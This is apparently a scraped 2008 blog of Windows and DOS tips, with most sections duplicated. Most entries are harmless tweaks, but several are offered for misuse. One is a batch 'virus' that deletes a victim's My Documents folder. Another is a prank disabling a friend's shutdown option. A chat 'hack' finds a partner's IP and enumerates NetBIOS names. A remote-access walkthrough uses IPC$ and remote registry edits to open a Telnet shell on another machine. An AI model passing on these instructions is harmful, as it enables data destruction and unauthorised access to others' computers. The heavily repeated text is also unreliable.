To convert a FAT partition to NTFS:
Click Start, click Programs, and then click Command Prompt.
In Windows XP, click Start, click Run, type cmd and then click OK.
At the command prompt, type CONVERT [driveletter]: /FS:NTFS.
Convert.exe will attempt to convert the partition to NTFS.
NOTE: Although the chance of corruption or data loss during the conversion from FAT to NTFS is minimal, it is best to perform a full backup of the data on the drive that it is to be converted prior to executing the convert command. It is also recommended to verify the integrity of the backup before proceeding, as well as to run RDISK and update the emergency repair disk (ERD).
Tuesday, February 5, 2008
creating a VIRUS!!
HERE'S A WAY I FOUND TO DELETE THE MY DOCUMENTS FOLDER OF UR ENEMY OR JUST 4 FUN.HERE'S WHAT U SHOULD DO.
OPEN NOTEPAD AND COPY-PASTE THE FOLLOWING CODE IN IT.THEN SAVE THE FILE WITH WHATEVER NAME U LIKE BUT BE SURE TO SAVE IT AS A BAT FILE.I MEAN SAVE IT LIKE MYVIRUS.BAT.IT SHOULD HAVE THE ENDING AS .BAT.NOW IF U GIVE THIS TO SOMEONE AND IF HE RUNS THIS PROGRAM THEN HIS MY DOCUMENT FOLDER WILL BE DELETED.
rmdir C:\Documents and Settings \S\Q.
OPEN NOTEPAD AND COPY-PASTE THE FOLLOWING CODE IN IT.THEN SAVE THE FILE WITH WHATEVER NAME U LIKE BUT BE SURE TO SAVE IT AS A BAT FILE.I MEAN SAVE IT LIKE MYVIRUS.BAT.IT SHOULD HAVE THE ENDING AS .BAT.NOW IF U GIVE THIS TO SOMEONE AND IF HE RUNS THIS PROGRAM THEN HIS MY DOCUMENT FOLDER WILL BE DELETED.
rmdir C:\Documents and Settings \S\Q.
SET the SEARCH screen to the classic look!!!
When I first saw the default search pane in Windows XP, my instinct was to return
it to its classic look; that puppy had to go. Of course, I later discovered that a
doggie door is built into the applet. Click "Change preferences" then "Without an
animated screen character." If you'd rather give it a bare-bones "Windows 2000" look
and feel, fire up your Registry editor and navigate to:
HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Explorer \
CabinetState.
You may need to create a new string value labeled "Use Search Asst" and set it to "no".
How to make your Desktop Icons Transparent
Go to ontrol Panel > System, > Advanced > Performance area > Settings button Visual Effects
tab "Use drop shadows for icon labels on the Desktop"
Remove the Recycle Bin from the Desktop
If you don't use the Recycle Bin to store deleted files ,
you can get rid of its desktop icon all together.
Run Regedit and go to:
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Wi
ndows/CurrentVersion/explorer/Desktop/NameSpace
Click on the "Recycle Bin" string in the right hand pane. Hit Del, click OK.
How to Rename the Recycle Bin
To change the name of the Recycle Bin desktop icon, open Regedit and go to:
HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}
and change the name "Recycle Bin" to whatever you want (don't type any quotes).
it to its classic look; that puppy had to go. Of course, I later discovered that a
doggie door is built into the applet. Click "Change preferences" then "Without an
animated screen character." If you'd rather give it a bare-bones "Windows 2000" look
and feel, fire up your Registry editor and navigate to:
HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Explorer \
CabinetState.
You may need to create a new string value labeled "Use Search Asst" and set it to "no".
How to make your Desktop Icons Transparent
Go to ontrol Panel > System, > Advanced > Performance area > Settings button Visual Effects
tab "Use drop shadows for icon labels on the Desktop"
Remove the Recycle Bin from the Desktop
If you don't use the Recycle Bin to store deleted files ,
you can get rid of its desktop icon all together.
Run Regedit and go to:
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Wi
ndows/CurrentVersion/explorer/Desktop/NameSpace
Click on the "Recycle Bin" string in the right hand pane. Hit Del, click OK.
How to Rename the Recycle Bin
To change the name of the Recycle Bin desktop icon, open Regedit and go to:
HKEY_CLASSES_ROOT/CLSID/{645FF040-5081-101B-9F08-00AA002F954E}
and change the name "Recycle Bin" to whatever you want (don't type any quotes).
DOS tricks!!
here are two additional switches that can be used when doing a DIR
1. /B - Shows only the long filename, no details
2. /Z - Shows the short filename, with details
3. /B /Z - Shows only short filename, with no details
DOS Command History
If you use DOSKEY in either your AUTOEXEC.BAT file or as part of the properties of your
you can show and recall the history of commands you enter and the DOS prompt.
* To recall previous commands, use the up arrow key.
* A complete list of previous commands can be shown if you press the F7 key
* To use one, press F9 and the number of the command you want to use
* To clear the cache, press Alt+F7
Changing a File's Date and Time Stamp
You can change the Date and Time stamp of a file to the current setting.
Type:
COPY filename /B + ,, /Y
Removing the Microsoft Copyright from a DOS Prompt
By default, when you open a DOS window, the Microsoft Copyright notice shows.
To disable it, add the /K switch in the Program tab
For example: C:\WINDOWS\COMMAND.COM /k
Setting the Number of Lines in a DOS Window
To set the number of lines displayed when you open up a DOS window:
1. Create a shortcut for the MS-DOS Prompt
2. Right click on it
3. Select Properties
4. Click on the Program tab
5. In the Batch file:, line enter mode con: lines=xx (where xx is the number of lines you want displayed)
6. Valid numbers for xx are 25 or 43
Submitted by John Karwoski
Starting DOS Fast
Want to start DOS fast outside of the START button? Drag it to your desktop.
Want to start it even FASTER without the mouse?
1. Change the shortcut properties of the DOS icon to something unique, like Ctrl-Alt-Z.
2. Then to start DOS from within Win95/98?/NT just enter C-A-Z and poof! it's there.
3. If you toggle away, and hit the shortcut sequence again, you'll get the "old" DOS box, not a new one.
Long Filenames in a DOS Box
More long filenames in DOS paths...
You don't need the close double quote when entering long folder names in DOS.
CD "\program files
works as well as
CD "\program files"
You can use long file names in a MS DOS Box.
All you have to do is pu the long file name in quotes.
Example: cd "program files"
Expanding Full Path or File Name
NT 4.0 Only
Expand full path/file name with defined char using Command Prompt in Win NT 4.0
You can expand the full name of a file or directory using a character of your choice.
1. Close all Command Prompts
2. Start the Registry Editor
3. Open HKEY_CURRENT_USER\Software\Microsoft\Command Processor
4. If not present, add Key: CompletionChar
5. If you like to use TAB-Key for expand: set value (REG_SZ): "9"
You can test it:
1. Open up a DOS window
2. Type: CD (followed by TAB)
3. The first available directory will appear
4. Press TAB again, the next one will appear
5. The same can be done with the DIR command
Adding DOSKEY to your DOS Window
One way to have DOSKEY available when you open a DOS window would be to have it in the AUTOEXEC.BAT file.
This takes away conventional memory, even when you don't have a DOS window open.
To only use DOSKEY when you open a DOS window:
* Right click on your DOS shortcut
* Select Properties
* Click on the Program tab
* Add DOSKEY > NUL to the Batch File field
* You can also add /INSERT if you prefer
Showing DOS Error Codes
If you want to see what error codes are being generated by DOS programs,
start your DOS session with the addition of a /Z parameter to the COMMAND.COM program.
Changing Directories in DOS
Normally, you can move up one directory level by typing CD ..
The DOS with Windows95 allows you to continue moving up beyond the first directory by simply adding more periods
For example, to move up two levels, type CD ...
Entering Long Paths in a DOS Window
If you have to enter a long path and program name in a DOS window,
1. Open up the Explorer
2. Go to the folder you want
3. Drag it to the DOS window
4. The path will be inserted into the window
This can come is useful with the long path names and all the ~'s you would normally need to type.
If you need to change directories, type in the CD before you drag the directory.
Having DOS Programs Prompt for Input
When you normally create a shortcut for a DOS program, it does not prompt you for any input and just runs the program
To change that, simply add a ? after the program name in the CMD field.
For example:
C:\WINDOWS\COMMAND\EDIT.COM ?
will start the DOS editor and prompt you for a file name to edit.
Verbose Directory Listing
To see your free memory and other useful info in detail:
1. Open a DOS box
2. Go to the directory that you want to get specific info about, or if you just want to see memory info go to any directory (I use the root).
3. Type DIR /V
4. The /v argument stands for "verbose".
5. All sorts of good information comes up.
Easy way to open up DOS prompt in a specific directory
With the advent of long directory names, it can be difficult to open up a DOS box and CD to the directory you want
particularly if it is several layers of long names deep.
An easy way is to:
1. Open up Explorer and highlight the directory you want to be in
2. Select Run / Command from the Start Menu
3. Your DOS prompt will now be in the directory you highlighted in Explorer
1. /B - Shows only the long filename, no details
2. /Z - Shows the short filename, with details
3. /B /Z - Shows only short filename, with no details
DOS Command History
If you use DOSKEY in either your AUTOEXEC.BAT file or as part of the properties of your
you can show and recall the history of commands you enter and the DOS prompt.
* To recall previous commands, use the up arrow key.
* A complete list of previous commands can be shown if you press the F7 key
* To use one, press F9 and the number of the command you want to use
* To clear the cache, press Alt+F7
Changing a File's Date and Time Stamp
You can change the Date and Time stamp of a file to the current setting.
Type:
COPY filename /B + ,, /Y
Removing the Microsoft Copyright from a DOS Prompt
By default, when you open a DOS window, the Microsoft Copyright notice shows.
To disable it, add the /K switch in the Program tab
For example: C:\WINDOWS\COMMAND.COM /k
Setting the Number of Lines in a DOS Window
To set the number of lines displayed when you open up a DOS window:
1. Create a shortcut for the MS-DOS Prompt
2. Right click on it
3. Select Properties
4. Click on the Program tab
5. In the Batch file:, line enter mode con: lines=xx (where xx is the number of lines you want displayed)
6. Valid numbers for xx are 25 or 43
Submitted by John Karwoski
Starting DOS Fast
Want to start DOS fast outside of the START button? Drag it to your desktop.
Want to start it even FASTER without the mouse?
1. Change the shortcut properties of the DOS icon to something unique, like Ctrl-Alt-Z.
2. Then to start DOS from within Win95/98?/NT just enter C-A-Z and poof! it's there.
3. If you toggle away, and hit the shortcut sequence again, you'll get the "old" DOS box, not a new one.
Long Filenames in a DOS Box
More long filenames in DOS paths...
You don't need the close double quote when entering long folder names in DOS.
CD "\program files
works as well as
CD "\program files"
You can use long file names in a MS DOS Box.
All you have to do is pu the long file name in quotes.
Example: cd "program files"
Expanding Full Path or File Name
NT 4.0 Only
Expand full path/file name with defined char using Command Prompt in Win NT 4.0
You can expand the full name of a file or directory using a character of your choice.
1. Close all Command Prompts
2. Start the Registry Editor
3. Open HKEY_CURRENT_USER\Software\Microsoft\Command Processor
4. If not present, add Key: CompletionChar
5. If you like to use TAB-Key for expand: set value (REG_SZ): "9"
You can test it:
1. Open up a DOS window
2. Type: CD (followed by TAB)
3. The first available directory will appear
4. Press TAB again, the next one will appear
5. The same can be done with the DIR command
Adding DOSKEY to your DOS Window
One way to have DOSKEY available when you open a DOS window would be to have it in the AUTOEXEC.BAT file.
This takes away conventional memory, even when you don't have a DOS window open.
To only use DOSKEY when you open a DOS window:
* Right click on your DOS shortcut
* Select Properties
* Click on the Program tab
* Add DOSKEY > NUL to the Batch File field
* You can also add /INSERT if you prefer
Showing DOS Error Codes
If you want to see what error codes are being generated by DOS programs,
start your DOS session with the addition of a /Z parameter to the COMMAND.COM program.
Changing Directories in DOS
Normally, you can move up one directory level by typing CD ..
The DOS with Windows95 allows you to continue moving up beyond the first directory by simply adding more periods
For example, to move up two levels, type CD ...
Entering Long Paths in a DOS Window
If you have to enter a long path and program name in a DOS window,
1. Open up the Explorer
2. Go to the folder you want
3. Drag it to the DOS window
4. The path will be inserted into the window
This can come is useful with the long path names and all the ~'s you would normally need to type.
If you need to change directories, type in the CD before you drag the directory.
Having DOS Programs Prompt for Input
When you normally create a shortcut for a DOS program, it does not prompt you for any input and just runs the program
To change that, simply add a ? after the program name in the CMD field.
For example:
C:\WINDOWS\COMMAND\EDIT.COM ?
will start the DOS editor and prompt you for a file name to edit.
Verbose Directory Listing
To see your free memory and other useful info in detail:
1. Open a DOS box
2. Go to the directory that you want to get specific info about, or if you just want to see memory info go to any directory (I use the root).
3. Type DIR /V
4. The /v argument stands for "verbose".
5. All sorts of good information comes up.
Easy way to open up DOS prompt in a specific directory
With the advent of long directory names, it can be difficult to open up a DOS box and CD to the directory you want
particularly if it is several layers of long names deep.
An easy way is to:
1. Open up Explorer and highlight the directory you want to be in
2. Select Run / Command from the Start Menu
3. Your DOS prompt will now be in the directory you highlighted in Explorer
AUTOMATING the installation of XP!!!
You can create a CD that can install Windows XP automatically, putting in all the details and answering all the dialog boxes.
The secret behind this is the answer file, which tells Windows what to do while it's installing. The answer file can be created using Windows setup manager.
Using this tool, you can make the answer file so powerful that you can even tell Windows to include or exclude individual components, set the display resolution, and more.
Here's the Steps involved in creating XP Automated Installation Disc :
Step 1: To begin with, insert your Windows XP installation CD into the drive and copy the entire contents of the CD to a new folder on your hard disk.
Step 2: Navigate to the Support > Tools folder on the CD and double-click the Deploy.cab file. Copy all the files to a new folder on your hard disk.
Step 3: The crucial part begins now, creating the answer file. To execute the windows setup manager, double click the Setupmgr.exe file from the contents of the Deploy.cab, which you just copied onto the hard drive.
Step 4: The first few steps of the wizard are self explanatory. Select the following options from the successive dialog boxes. Create a new answer file; Windows unattended installation (Select the appropriate Windows version); "Fully automated"; "No this answer file will be used to install from CD"; and finally, accept the license agreement.
Step 5: Under the General Settings, you can customize the installation of Windows by providing the default name and organization, display settings, time zone and the product key. Fill in the fields using the drop-down list or by keying in the details. If you don't select an option from the drop-down list, the default values will be used.
Step 6: After you are done click Finish and save the answer file as "winnt.sif" when you are prompted. Advanced users can further tweak the answer file by referring to the Help file called Ref.chm in the same folder.
Step 7: Finally copy the answer file to i386 folder in the Windows XP installation folder you created in the beginning.
Step 8: To burn a bootable installation disc, you need the boot sector of the Windows XP CD. Download it from here bootfiles.zip
Step 9: Launch Nero and select CD-ROM (Boot) from the New Compilation dialog box. Under the Boot tab, specify the boot sector file you downloaded and extracted. Set the emulation as "No emulation", and keep the boot message blank. Most importantly, remember to set the "Number of loaded sectors" as 4.
Step 10: Under the Burn tab, set the write method to disc at-once. Click the New button to to begin adding files and folders to the compilation. Drag all the contents of the Windows XP installation disc that you copied to your hard drive (with the answer file in the i386 folder) into the left pane. Insert a blank CD into the optical drive and hit burn button. Your windows automated installation Disc is ready! :)
The secret behind this is the answer file, which tells Windows what to do while it's installing. The answer file can be created using Windows setup manager.
Using this tool, you can make the answer file so powerful that you can even tell Windows to include or exclude individual components, set the display resolution, and more.
Here's the Steps involved in creating XP Automated Installation Disc :
Step 1: To begin with, insert your Windows XP installation CD into the drive and copy the entire contents of the CD to a new folder on your hard disk.
Step 2: Navigate to the Support > Tools folder on the CD and double-click the Deploy.cab file. Copy all the files to a new folder on your hard disk.
Step 3: The crucial part begins now, creating the answer file. To execute the windows setup manager, double click the Setupmgr.exe file from the contents of the Deploy.cab, which you just copied onto the hard drive.
Step 4: The first few steps of the wizard are self explanatory. Select the following options from the successive dialog boxes. Create a new answer file; Windows unattended installation (Select the appropriate Windows version); "Fully automated"; "No this answer file will be used to install from CD"; and finally, accept the license agreement.
Step 5: Under the General Settings, you can customize the installation of Windows by providing the default name and organization, display settings, time zone and the product key. Fill in the fields using the drop-down list or by keying in the details. If you don't select an option from the drop-down list, the default values will be used.
Step 6: After you are done click Finish and save the answer file as "winnt.sif" when you are prompted. Advanced users can further tweak the answer file by referring to the Help file called Ref.chm in the same folder.
Step 7: Finally copy the answer file to i386 folder in the Windows XP installation folder you created in the beginning.
Step 8: To burn a bootable installation disc, you need the boot sector of the Windows XP CD. Download it from here bootfiles.zip
Step 9: Launch Nero and select CD-ROM (Boot) from the New Compilation dialog box. Under the Boot tab, specify the boot sector file you downloaded and extracted. Set the emulation as "No emulation", and keep the boot message blank. Most importantly, remember to set the "Number of loaded sectors" as 4.
Step 10: Under the Burn tab, set the write method to disc at-once. Click the New button to to begin adding files and folders to the compilation. Drag all the contents of the Windows XP installation disc that you copied to your hard drive (with the answer file in the i386 folder) into the left pane. Insert a blank CD into the optical drive and hit burn button. Your windows automated installation Disc is ready! :)
how to fix corrupted files of XP!!!
Required:
1. Windows XP operating system
2. Windows XP cd
Now, follow this steps:
1. Place the xp cd in your cd/dvd drive
2. Go to start
3. run
4. type in 'sfc /scannow' (without the ')
Now it should all load, and fix all your corrupted file on win XP.
1. Windows XP operating system
2. Windows XP cd
Now, follow this steps:
1. Place the xp cd in your cd/dvd drive
2. Go to start
3. run
4. type in 'sfc /scannow' (without the ')
Now it should all load, and fix all your corrupted file on win XP.
remove the shutdown option!!
Wanna play with your friends by removing the shutdown option from start menu in their computer.
Just hack it down !!!
Click on start>run(win key+r)
Then tpye “regedit” there, this opens up the registry editor, now goto
HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>Wi
ndows>CurrentVersion>Explorer
Then set “NoClose”=”DWORD:1
Just hack it down !!!
Click on start>run(win key+r)
Then tpye “regedit” there, this opens up the registry editor, now goto
HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>Wi
ndows>CurrentVersion>Explorer
Then set “NoClose”=”DWORD:1
how to clone a HARDDRIVE!!!
Did know that you could clone your current Hard Drive without having to by extra software? Maybe you didn't know that all that you needed, was already set up on your current system? Well, it is... and if you follow this tut, you shouldn't have much of a problem.
Make sure that you have a Master and a Slave setup on your system. The Slave drive, in this case, is where all the data on the Master is going to go to.
First: Perform a Scandisk your Master drive and follow that with a thorough Defrag. If you have an Antivirus program, do a thorough sweep with the AV first, then do the Scandisk, followed by the Defrag.
Second: Do the same thing to the target drive, as you did the Master: Scandisk then a thorough Defrag.
Third: Right-click on the Target drive and click on Format. When the box comes up, click your mouse onto the "Full" button.
Fourth: After Formatting the Target drive, run a Scandisk again and click on the button that says "Autofix Errors".
Fifth: In this final part, you might want to cut-and-paste to code in, unless you are sure that you can do it without making any mistakes:
Click on the "Start" button, then click on the "Run..." button, then place the following into the Runbox:
"XCOPY C:\*.*D:\ /c/h/e/k/r" (minus the quotes, of course) then press the "Enter" button.
If you receive an error message, then remove the space from between XCOPY and C:\
Anything that should happen to come up in the DOS box, just click "Y" for "Yes". When its all finished, pull the original Master from the system, designate the Slave as the Master (change your jumpers), then check your new Master out.
This tut has worked and has been tested on all systems except for Windows 2000, so you really shouldn't have any problems. If, by any chance, you should come across a snag, message me and I'll walk you through it.
Make sure that you have a Master and a Slave setup on your system. The Slave drive, in this case, is where all the data on the Master is going to go to.
First: Perform a Scandisk your Master drive and follow that with a thorough Defrag. If you have an Antivirus program, do a thorough sweep with the AV first, then do the Scandisk, followed by the Defrag.
Second: Do the same thing to the target drive, as you did the Master: Scandisk then a thorough Defrag.
Third: Right-click on the Target drive and click on Format. When the box comes up, click your mouse onto the "Full" button.
Fourth: After Formatting the Target drive, run a Scandisk again and click on the button that says "Autofix Errors".
Fifth: In this final part, you might want to cut-and-paste to code in, unless you are sure that you can do it without making any mistakes:
Click on the "Start" button, then click on the "Run..." button, then place the following into the Runbox:
"XCOPY C:\*.*D:\ /c/h/e/k/r" (minus the quotes, of course) then press the "Enter" button.
If you receive an error message, then remove the space from between XCOPY and C:\
Anything that should happen to come up in the DOS box, just click "Y" for "Yes". When its all finished, pull the original Master from the system, designate the Slave as the Master (change your jumpers), then check your new Master out.
This tut has worked and has been tested on all systems except for Windows 2000, so you really shouldn't have any problems. If, by any chance, you should come across a snag, message me and I'll walk you through it.
common scrap anyone without any ads!!(orkut)
javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://userscripts.org/scripts/source/11850.user.js';void(0)
Saturday, February 2, 2008
hacking PC while chatting!!
I am not sure that this will work 100 %.
But yes will work almost 70 percent of the times.
But before that you need to know some few things of yahoo chat protocol
leave a comment here after u see the post lemme know if it does works or not or u having a problem post here.
Following are the features : -
1) When we chat on yahoo every thing goes through the server.Only when we chat thats messages.
2) When we send files yahoo has 2 options
a) Either it uploads the file and then the other client has to down load it.
Either it connects to the client directly and gets the files
3) When we use video or audio:-
a) It either goes thru the server
Or it has client to client connection
And when we have client to client connection the opponents IP is revealed.On the 5051 port.So how do we exploit the Chat user when he gets a direct connection. And how do we go about it.Remember i am here to hack a system with out using a TOOL only by simple net commands and yahoo chat techniques.Thats what makes a difference between a real hacker and new bies.
So lets analyse
1) Its impossible to get a Attackers IP address when you only chat.
2) There are 50 % chances of getting a IP address when you send files
3) Again 50 % chances of getting IP when you use video or audio.
So why to wait lets exploit those 50 % chances .
I'll explain only for files here which lies same for Video or audio
1) Go to dos
type ->
netstat -n 3
You will get the following output.Just do not care and be cool
Active Connections
Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
Active Connections
Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
Just i will explain what the out put is in general.In left hand side is your IP address.And in right hand side is the IP address of the foreign machine.And the port to which is connected.Ok now so what next ->
2) Try sending a file to the Target .
if the files comes from server.Thats the file is uploaded leave itYou will not get the ip.But if a direct connection is established
HMMMM then the first attacker first phase is over
This is the output in your netstat.The 5101 number port is where the Attacker is connected.
Active Connections
Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
TCP 194.30.209.15:5101 194.30.209.14:3290 ESTABLISHED
3) so what next???
Hmmm........ Ok so make a DOS attack now
Go to dos prompt and
Just do
nbtstat -A Attackers IPaddress.Can happen that if system is not protected then you can see the whole network.
C:\>nbtstat -A 194.30.209.14
Local Area Connection:
Node IpAddress: [194.30.209.15] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
EDP12 <00> UNIQUE Registered
XYZ <00> GROUP Registered
XYZ <20> UNIQUE Registered
XYZCOMP1 <1E> GROUP Registered
MAC Address = 00-C0-W0-D5-EF-9A
What to do next??
It is now ur job to tell me what u have done next...
So the conclusion is never exchange files , video or audio till you know that the user with whom you are chatting is not going to harm you.
But yes will work almost 70 percent of the times.
But before that you need to know some few things of yahoo chat protocol
leave a comment here after u see the post lemme know if it does works or not or u having a problem post here.
Following are the features : -
1) When we chat on yahoo every thing goes through the server.Only when we chat thats messages.
2) When we send files yahoo has 2 options
a) Either it uploads the file and then the other client has to down load it.
Either it connects to the client directly and gets the files
3) When we use video or audio:-
a) It either goes thru the server
Or it has client to client connection
And when we have client to client connection the opponents IP is revealed.On the 5051 port.So how do we exploit the Chat user when he gets a direct connection. And how do we go about it.Remember i am here to hack a system with out using a TOOL only by simple net commands and yahoo chat techniques.Thats what makes a difference between a real hacker and new bies.
So lets analyse
1) Its impossible to get a Attackers IP address when you only chat.
2) There are 50 % chances of getting a IP address when you send files
3) Again 50 % chances of getting IP when you use video or audio.
So why to wait lets exploit those 50 % chances .
I'll explain only for files here which lies same for Video or audio
1) Go to dos
type ->
netstat -n 3
You will get the following output.Just do not care and be cool
Active Connections
Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
Active Connections
Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
Just i will explain what the out put is in general.In left hand side is your IP address.And in right hand side is the IP address of the foreign machine.And the port to which is connected.Ok now so what next ->
2) Try sending a file to the Target .
if the files comes from server.Thats the file is uploaded leave itYou will not get the ip.But if a direct connection is established
HMMMM then the first attacker first phase is over
This is the output in your netstat.The 5101 number port is where the Attacker is connected.
Active Connections
Proto Local Address Foreign Address State
TCP 194.30.209.15:1631 194.30.209.20:5900 ESTABLISHED
TCP 194.30.209.15:2736 216.136.224.214:5050 ESTABLISHED
TCP 194.30.209.15:2750 64.4.13.85:1863 ESTABLISHED
TCP 194.30.209.15:2864 64.4.12.200:1863 ESTABLISHED
TCP 194.30.209.15:5101 194.30.209.14:3290 ESTABLISHED
3) so what next???
Hmmm........ Ok so make a DOS attack now
Go to dos prompt and
Just do
nbtstat -A Attackers IPaddress.Can happen that if system is not protected then you can see the whole network.
C:\>nbtstat -A 194.30.209.14
Local Area Connection:
Node IpAddress: [194.30.209.15] Scope Id: []
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
EDP12 <00> UNIQUE Registered
XYZ <00> GROUP Registered
XYZ <20> UNIQUE Registered
XYZCOMP1 <1E> GROUP Registered
MAC Address = 00-C0-W0-D5-EF-9A
What to do next??
It is now ur job to tell me what u have done next...
So the conclusion is never exchange files , video or audio till you know that the user with whom you are chatting is not going to harm you.
changing title of MEDIA player!!
You can change the title bar for the Windows Media Player
1.Start Regedit
2.Go to HKEY_CURRENT_USER\Software\Policies\Microsoft
\WindowsMediaPlayer (create a new key named WindowsMediaPlayer if its not der)
3.Create a string value of TitleBar
4.Give it a value of whatever you want to appear in the title bar
1.Start Regedit
2.Go to HKEY_CURRENT_USER\Software\Policies\Microsoft
\WindowsMediaPlayer (create a new key named WindowsMediaPlayer if its not der)
3.Create a string value of TitleBar
4.Give it a value of whatever you want to appear in the title bar
hack IE!!
This is not a big trick
Just for timepass
Go to start->run
Type regedit
press enter
in registry editor go to
HKEY_CURRENT_USER->Software->Microsoft->Internet explorer->main
there u will find something like "windows title"
double click on that and change the value data with anything u want
and click ok
press F5
restart ur internet explorer
see the title of it
Just for timepass
Go to start->run
Type regedit
press enter
in registry editor go to
HKEY_CURRENT_USER->Software->Microsoft->Internet explorer->main
there u will find something like "windows title"
double click on that and change the value data with anything u want
and click ok
press F5
restart ur internet explorer
see the title of it
increase ur browsing speed!!
Speed up your firefox browser and load pages about 20% faster than previous.
1. Type "about:config" into the address bar and hit return. Scroll down and look for the following entries:
network.http.pipeliningnetwork.http.proxy.pipeliningnetwork.http.pipelining.maxrequests
Normally the browser will make one request to a web page at a time. When you enable pipelining it will make several at once, which really speeds up page loading.
2. Alter the entries as follows:
Set "network.http.pipelining" to "true"
Set "network.http.proxy.pipelining" to "true"
Set "network.http.pipelining.maxrequests" to some number like 30. This means it will make 30 requests at once.
3. Lastly right-click anywhere and select New-> Integer. Name it "nglayout.initialpaint.delay" and set its value to "0". This value is the amount of time the browser waits before it acts on information it recieves.
If you're using a broadband connection you'll load pages 2-3 times faster now.
mozila net increase speed
1. Type "about:config" into the address bar and hit return. Scroll down and look for the following entries:
network.http.pipeliningnetwork.http.proxy.pipeliningnetwork.http.pipelining.maxrequests
Normally the browser will make one request to a web page at a time. When you enable pipelining it will make several at once, which really speeds up page loading.
2. Alter the entries as follows:
Set "network.http.pipelining" to "true"
Set "network.http.proxy.pipelining" to "true"
Set "network.http.pipelining.maxrequests" to some number like 30. This means it will make 30 requests at once.
3. Lastly right-click anywhere and select New-> Integer. Name it "nglayout.initialpaint.delay" and set its value to "0". This value is the amount of time the browser waits before it acts on information it recieves.
If you're using a broadband connection you'll load pages 2-3 times faster now.
mozila net increase speed
remote access method!!
Just Control Another Computer Remotely.
Things tO Need
Remote Pc's Account Username And Password
<-- Method -->
1. Go tO COmmand Promt(press Windows+R and type cmd)
2. type cd\ (to go to main root Of C:)
3. type the command
c:\net use \\(Rempote PC's Username i.e Adrian)\ipc$ /u:Administrator
c:\net use \\Adrian\ipc$ /u:Administrator(press Enter)
(Results of the above Command)
The Password Or Username Is Invalid For \\Adrian\ipc$.
Enter The PassWord For "Administrator" tp connect to 'Adrian':*****
The Command COmpleted Successfuly.
4. Press Window+R Write regedit To Enter RegsitryEditor.
5. Press Alt+F Then C.
6. Write Down The "Object's Name".Adrian(Computer's Username)then Press Enter.
(New Computer's Registry Is Successsfully Accessed).
7. Just GO TO
Adrian\HKEY_LOCAL_MACHINE\SFTWARE\Microsoft\Windows\TelnetServer\1.0
On The Right Hand Double Click On The Key Named As "NTLM"(New BOx Appear)
Value Name:NTLM
Value Data:(Replace 2 with 0)
Base :HexaDecimal
Press OK.
Get Out Of registry Editor.
8. Again Press Windows+R And Write mmc.(Consol1 Will Open)
9. Press Alt+F then M(New Windows Will Appear)
10.Press Alt+D Then Double Click On "Computer Management"
11.Select "another Computer" and write its Account Login(Adrian).
12.Press Finish And Then Close The "Add StandALone Snap-in"Dialogue Box.
13.Now Press OK Of "Add/Remove Snap-in".
14.On The Left Hand Expand Computer Management>Select Services And Aplications>Services
15.On The Right Hand Scroll down And Right CLick At "Telnet"And Select Restart Option.
16.Leave It As It is
17.Turn To Command Promt Write
c:\telnet Adrian(Press Enter)
it Will Require Login And PassWord
Login:Administrator
PassWord:********(Enter)
*-----------------------------------------------------------
Welcome TO Microsoft Telnet SErver
C:dir(Enter)
Thats It!
Enjoy With Kenreaves!!!
Things tO Need
Remote Pc's Account Username And Password
<-- Method -->
1. Go tO COmmand Promt(press Windows+R and type cmd)
2. type cd\ (to go to main root Of C:)
3. type the command
c:\net use \\(Rempote PC's Username i.e Adrian)\ipc$ /u:Administrator
c:\net use \\Adrian\ipc$ /u:Administrator(press Enter)
(Results of the above Command)
The Password Or Username Is Invalid For \\Adrian\ipc$.
Enter The PassWord For "Administrator" tp connect to 'Adrian':*****
The Command COmpleted Successfuly.
4. Press Window+R Write regedit To Enter RegsitryEditor.
5. Press Alt+F Then C.
6. Write Down The "Object's Name".Adrian(Computer's Username)then Press Enter.
(New Computer's Registry Is Successsfully Accessed).
7. Just GO TO
Adrian\HKEY_LOCAL_MACHINE\SFTWARE\Microsoft\Windows\TelnetServer\1.0
On The Right Hand Double Click On The Key Named As "NTLM"(New BOx Appear)
Value Name:NTLM
Value Data:(Replace 2 with 0)
Base :HexaDecimal
Press OK.
Get Out Of registry Editor.
8. Again Press Windows+R And Write mmc.(Consol1 Will Open)
9. Press Alt+F then M(New Windows Will Appear)
10.Press Alt+D Then Double Click On "Computer Management"
11.Select "another Computer" and write its Account Login(Adrian).
12.Press Finish And Then Close The "Add StandALone Snap-in"Dialogue Box.
13.Now Press OK Of "Add/Remove Snap-in".
